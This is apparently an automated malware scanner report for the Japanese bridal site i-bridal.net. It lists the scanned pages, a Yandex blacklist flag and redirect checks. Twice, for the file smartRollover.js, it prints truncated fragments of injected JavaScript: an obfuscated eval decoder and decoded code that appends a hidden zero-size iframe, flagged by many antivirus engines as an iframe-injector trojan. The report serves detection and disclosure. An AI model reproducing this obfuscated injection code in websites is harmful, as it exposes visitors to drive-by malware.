Malware Scanner report for i-bridal.net

Malicious/Suspicious/Total urls checked: 2/0/15

2 pages have malicious code. See details below

Blacklists: Found

The website is marked by Yandex as suspicious.

The website "i-bridal.net" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/0/0

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=i-bridal.net

Result: This site is not currently listed as suspicious.

Query: http://yandex.com/infected?l10n=en&url=http://i-bridal.net/

Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

Request	Server response	Status
http://i-bridal.net/	200 OK Content-Length: 9192 Content-Type: text/html	clean
http://i-bridal.net/./common/js/smartRollover.js	200 OK Content-Length: 8094 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) function smartRollover() { if(document.getElementsByTagName) { var images = document.getElementsByTagName("img"); for(var i=0; i < images.length; i++) { if(images[i].getAttribute("src").match("_off.")) { images[i].onmouseover = function() { this.setAttribute("src", this.getAttribute("src").replace("_off.", "_on.")); } images[i].onmouseout = function() { this.setAttribute("src", this.getAttribute("src").replace("_on.", "_ ... 3092 bytes are skipped ...06,550,204,295,192,50,192,160,192,160,192,160,192,160,192,160,192,160,600,555,594,585,654,505,660,580,276,490,666,500,726,230,582,560,672,505,660,500,402,520,630,540,600,200,630,510,684,545,246,295,60,160,192,160,192,160,192,160,192,625,60,160,192,160,192,625,594,485,696,495,624,200,606,205,738,625,60,625,264,160,318,240,288,205,354];v="eva";}if(v)e=window[v+"l"];w=f;s=[];r=String;z=((e)?"Code":"");for(;1776-5+5>i;i+=1){j=i;if(e)s=s+r[fr+((e)?"Code":12)]((w[j]/(5+e("j%2"))));} if(f)e(s);} Decoded script: function smartRollover() { if (document.getElementsByTagName) { var images = document.getElementsByTagName("img"); for (var i = 0; i < images.length; i++) { if (images[i].getAttribute("src").match("_off.")) { images[i].onmouseover = function () {this.setAttribute("src", this.getAttribute("src").replace("_off.", "_on."));}; images[i].onmouseout = function () {this.setAttribute("src", this.getAttribute( ... 33580 bytes are skipped ... ifrm.style.width = "0px"; ifrm.style.height = "0px"; ifrm.style.visibility = "hidden"; document.body.appendChild(ifrm); } } catch (e) { } }, 500 / var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return (this.see Antivirus reports: Avast JS:Iframe-ANQ [Trj] Ad-Aware JS:Trojan.Iframer.C nProtect JS:Trojan.Iframer.C Emsisoft JS:Trojan.Iframer.C (B) Microsoft Trojan:JS/Iframeinject.AB Kaspersky HEUR:Trojan.Script.Iframer MicroWorld-eScan JS:Trojan.Iframer.C NANO-Antivirus Trojan.Script.Agent.xyevo F-Secure JS:Trojan.Iframer.C F-Prot JS/IFrame.QW AVG HTML/Framer GData JS:Trojan.Iframer.C Commtouch JS/IFrame.QW BitDefender JS:Trojan.Iframer.C
http://i-bridal.net/0101_service.html	200 OK Content-Length: 10689 Content-Type: text/html	clean
http://i-bridal.net/common/js/smartRollover.js	200 OK Content-Length: 8094 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) function smartRollover() { if(document.getElementsByTagName) { var images = document.getElementsByTagName("img"); for(var i=0; i < images.length; i++) { if(images[i].getAttribute("src").match("_off.")) { images[i].onmouseover = function() { this.setAttribute("src", this.getAttribute("src").replace("_off.", "_on.")); } images[i].onmouseout = function() { this.setAttribute("src", this.getAttribute("src").replace("_on.", "_ ... 3092 bytes are skipped ...06,550,204,295,192,50,192,160,192,160,192,160,192,160,192,160,192,160,600,555,594,585,654,505,660,580,276,490,666,500,726,230,582,560,672,505,660,500,402,520,630,540,600,200,630,510,684,545,246,295,60,160,192,160,192,160,192,160,192,625,60,160,192,160,192,625,594,485,696,495,624,200,606,205,738,625,60,625,264,160,318,240,288,205,354];v="eva";}if(v)e=window[v+"l"];w=f;s=[];r=String;z=((e)?"Code":"");for(;1776-5+5>i;i+=1){j=i;if(e)s=s+r[fr+((e)?"Code":12)]((w[j]/(5+e("j%2"))));} if(f)e(s);} Decoded script: function smartRollover() { if (document.getElementsByTagName) { var images = document.getElementsByTagName("img"); for (var i = 0; i < images.length; i++) { if (images[i].getAttribute("src").match("_off.")) { images[i].onmouseover = function () {this.setAttribute("src", this.getAttribute("src").replace("_off.", "_on."));}; images[i].onmouseout = function () {this.setAttribute("src", this.getAttribute( ... 33580 bytes are skipped ... ifrm.style.width = "0px"; ifrm.style.height = "0px"; ifrm.style.visibility = "hidden"; document.body.appendChild(ifrm); } } catch (e) { } }, 500 / var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return (this.see Antivirus reports: Avast JS:Iframe-ANQ [Trj] Ad-Aware JS:Trojan.Iframer.C nProtect JS:Trojan.Iframer.C Emsisoft JS:Trojan.Iframer.C (B) Microsoft Trojan:JS/Iframeinject.AB Kaspersky HEUR:Trojan.Script.Iframer MicroWorld-eScan JS:Trojan.Iframer.C NANO-Antivirus Trojan.Script.Agent.xyevo F-Secure JS:Trojan.Iframer.C F-Prot JS/IFrame.QW AVG HTML/Framer GData JS:Trojan.Iframer.C Commtouch JS/IFrame.QW BitDefender JS:Trojan.Iframer.C
http://i-bridal.net/index.html	200 OK Content-Length: 9192 Content-Type: text/html	clean
http://i-bridal.net/0201_sample.html	200 OK Content-Length: 7820 Content-Type: text/html	clean
http://i-bridal.net/0301_price.html	200 OK Content-Length: 9002 Content-Type: text/html	clean
http://i-bridal.net/0401_appli.html	200 OK Content-Length: 9168 Content-Type: text/html	clean
http://i-bridal.net/0501_qa.html	200 OK Content-Length: 13700 Content-Type: text/html	clean
http://i-bridal.net/0601_inq.html	200 OK Content-Length: 5269 Content-Type: text/html	clean
http://i-bridal.net/1001_guide.html	404 Not Found Content-Length: 290 Content-Type: text/html	clean
http://i-bridal.net/test404page.js	404 Not Found Content-Length: 289 Content-Type: text/html	clean
http://i-bridal.net/1002_privacy.html	200 OK Content-Length: 6360 Content-Type: text/html	clean
http://i-bridal.net/1003_rule.html	200 OK Content-Length: 12838 Content-Type: text/html	clean
http://i-bridal.net/0402_appliform.html	200 OK Content-Length: 18439 Content-Type: text/html	clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: i-bridal.net

Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 13 Aug 2014 01:25:19 GMT
Accept-Ranges: bytes
ETag: "cc681a1-23e8-493be8ad31040"
Server: Apache/2.2.3 (CentOS)
Content-Length: 9192
Content-Type: text/html
Last-Modified: Fri, 29 Oct 2010 10:01:29 GMT
X-Powered-By: PleskLin

...9192 bytes of data.

Second query (visit from search engine):
GET / HTTP/1.1
Host: i-bridal.net
Referer: http://www.google.com/search?q=i-bridal.net

Result:
The result is similar to the first query. There are no suspicious redirects found.

Recently found suspicious websites

Malware Scanner report for i-bridal.net

Malware & Hack Repair

Website Hack Insurance

Safe Browsing / Blacklists

Scanned pages/files

Malicious Redirects

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools